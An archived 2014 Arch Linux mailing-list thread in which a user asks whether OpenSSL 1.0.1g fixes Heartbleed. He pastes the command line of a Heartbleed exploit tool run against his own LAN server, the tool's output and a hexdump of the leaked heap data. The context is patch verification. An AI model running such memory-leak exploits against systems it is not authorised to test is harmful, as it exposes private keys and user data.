[arch-general] Does openssl 1.0.1.g-1 close the heartbleed exploit?

Dimitris Zervas dzervas at dzervas.gr
Fri Apr 25 03:48:11 EDT 2014 

I tested my server after the update and found no problems...
On Apr 25, 2014 10:41 AM, "David C. Rankin" <drankinatty at suddenlinkmail.com>
wrote:

> Guys,
>
>   I was testing my boxes after updating to openssl 1.0.1.g-1 with
> heartbleed.c
> and I am still able to grab and decrypt ssl packets. The openssl security
> note
> says 1.0.1.g is not effected by the bug, but I can still get a 64k chuck
> of data
> back from my server using the heartbleed.c test. (if I'm reading the output
> correctly) Am I may be doing something wrong? It is worth asking to be
> sure.
>
> Archlinux server: phoinix - openssl 1.0.1.g-1
>
> from client machine:
>
>  $ ./heartbleed386 -s 192.168.7.16 -p 443 -f outph -t 1
> [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
> [ =============================================================
> [ connecting to 192.168.7.16 443/tcp
> [ connected to 192.168.7.16 443/tcp
> [ <3 <3 <3 heart bleed <3 <3 <3
> [ heartbeat returned type=24 length=16408
> [ decrypting SSL packet
> [ heartbleed leaked length=65535
> [ final record type=24, length=16384
> [ wrote 16381 bytes of heap to file 'outph'
> [ heartbeat returned type=24 length=16408
> [ decrypting SSL packet
> [ final record type=24, length=16384
> [ wrote 16384 bytes of heap to file 'outph'
> [ heartbeat returned type=24 length=16408
> [ decrypting SSL packet
> [ final record type=24, length=16384
> [ wrote 16384 bytes of heap to file 'outph'
> [ heartbeat returned type=24 length=16408
> [ decrypting SSL packet
> [ final record type=24, length=16384
> [ wrote 16384 bytes of heap to file 'outph'
> [ heartbeat returned type=24 length=42
> [ decrypting SSL packet
> [ final record type=24, length=18
> [ wrote 18 bytes of heap to file 'outph'
> [ done.
>  $ ls -al outph
> -rwx------ 1 david david 65554 Apr 25 01:43 outph
>  $ hexdump -C outph
> 00000000  52 74 59 da c6 d0 3a 5d  35 7e 33 fc 43 de e5 bb
>  |RtY...:]5~3.C...|
> 00000010  31 a2 ca c1 30 ff 5a e7  fd 28 52 4a 3c 18 51 4b
>  |1...0.Z..(RJ<.QK|
> 00000020  93 1e 2e 7b 41 58 e2 79  58 b8 26 f4 a0 d2 11 22
>  |...{AX.yX.&...."|
> 00000030  4d bc 62 54 7c 59 5c 63  11 42 fe 88 00 87 c0 32
>  |M.bT|Y\c.B.....2|
> 00000040  c0 2e c0 2a c0 26 c0 0f  c0 05 00 9d 00 3d 00 35
>  |...*.&.......=.5|
> 00000050  00 84 c0 12 c0 08 c0 1c  c0 1b 00 16 00 13 c0 0d
>  |................|
> 00000060  c0 03 00 0a c0 2f c0 2b  c0 27 c0 23 c0 13 c0 09
>  |...../.+.'.#....|
> 00000070  c0 1f c0 1e 00 a2 00 9e  00 67 00 40 00 33 00 32  |.........g.@
> .3.2|
> 00000080  00 9a 00 99 00 45 00 44  c0 31 c0 2d c0 29 c0 25
>  |.....E.D.1.-.).%|
> 00000090  c0 0e c0 04 00 9c 00 3c  00 2f 00 96 00 41 00 07
>  |.......<./...A..|
> 000000a0  c0 11 c0 07 c0 0c c0 02  00 05 00 04 00 15 00 12
>  |................|
> 000000b0  00 09 00 14 00 11 00 08  00 06 00 03 00 ff 02 01
>  |................|
> 000000c0  00 01 32 00 0b 00 04 03  00 01 02 00 0a 00 34 00
>  |..2...........4.|
> 000000d0  32 00 0e 00 0d 00 19 00  0b 00 0c 00 18 00 09 00
>  |2...............|
> 000000e0  0a 00 16 00 17 00 08 00  06 00 07 00 14 00 15 00
>  |................|
> 000000f0  04 00 05 00 12 00 13 00  01 00 02 00 03 00 0f 00
>  |................|
> 00000100  10 00 11 00 23 00 00 00  0d 00 20 00 1e 06 01 06  |....#.....
> .....|
> 00000110  02 06 03 05 01 05 02 05  03 04 01 04 02 04 03 03
>  |................|
> 00000120  01 03 02 03 03 02 01 02  02 02 03 00 0f 00 01 01
>  |................|
> 00000130  00 15 00 c1 00 00 00 00  00 00 00 00 00 00 00 00
>  |................|
> 00000140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
>  |................|
> *
> 000001f0  00 00 00 00 00 5c c0 5d  c0 5e c0 5f c0 60 c0 61
>  |.....\.].^._.`.a|
> 00000200  c0 62 c0 63 c0 64 c0 65  c0 66 c0 67 c0 68 c0 69
>  |.b.c.d.e.f.g.h.i|
> 00000210  c0 6a c0 6b c0 6c c0 6d  c0 6e c0 6f c0 70 c0 71
>  |.j.k.l.m.n.o.p.q|
> 00000220  c0 72 c0 73 c0 74 c0 75  c0 76 c0 77 c0 78 c0 79
>  |.r.s.t.u.v.w.x.y|
> 00000230  c0 7a c0 7b c0 7c c0 7d  c0 7e c0 7f c0 80 c0 81
>  |.z.{.|.}.~......|
> <snip - a lot more, with CN and other cert into visible>
>
>   Can anyone confirm the openssl 1.0.1.g-1 fix against their arch server?
> The
> information I get back in response to heartbleed has been decrypted -- that
> leads me to believe the current openssl 1.0.1.g-1 may be suspect as well.
> Or am
> I looking at this wrong?
>
>   The ./heartbleed output that concerns me is:
>
> [ heartbleed leaked length=65535
>
>   However, each of the subsequent calls by ./heartbleed returned only
> ~16408,
> which if I understand correctly is the max that should be returned after
> the fix:
>
> [ heartbeat returned type=24 length=16408
> [ decrypting SSL packet
> [ final record type=24, length=16384
> [ wrote 16384 bytes of heap to file 'outph'
>
>   Is this the expected fixed behavior, or does this still reflect a
> vulnerability present? What say the experts? Thanks.
>
> --
> David C. Rankin, J.D.,P.E.
>

More information about the arch-general mailing list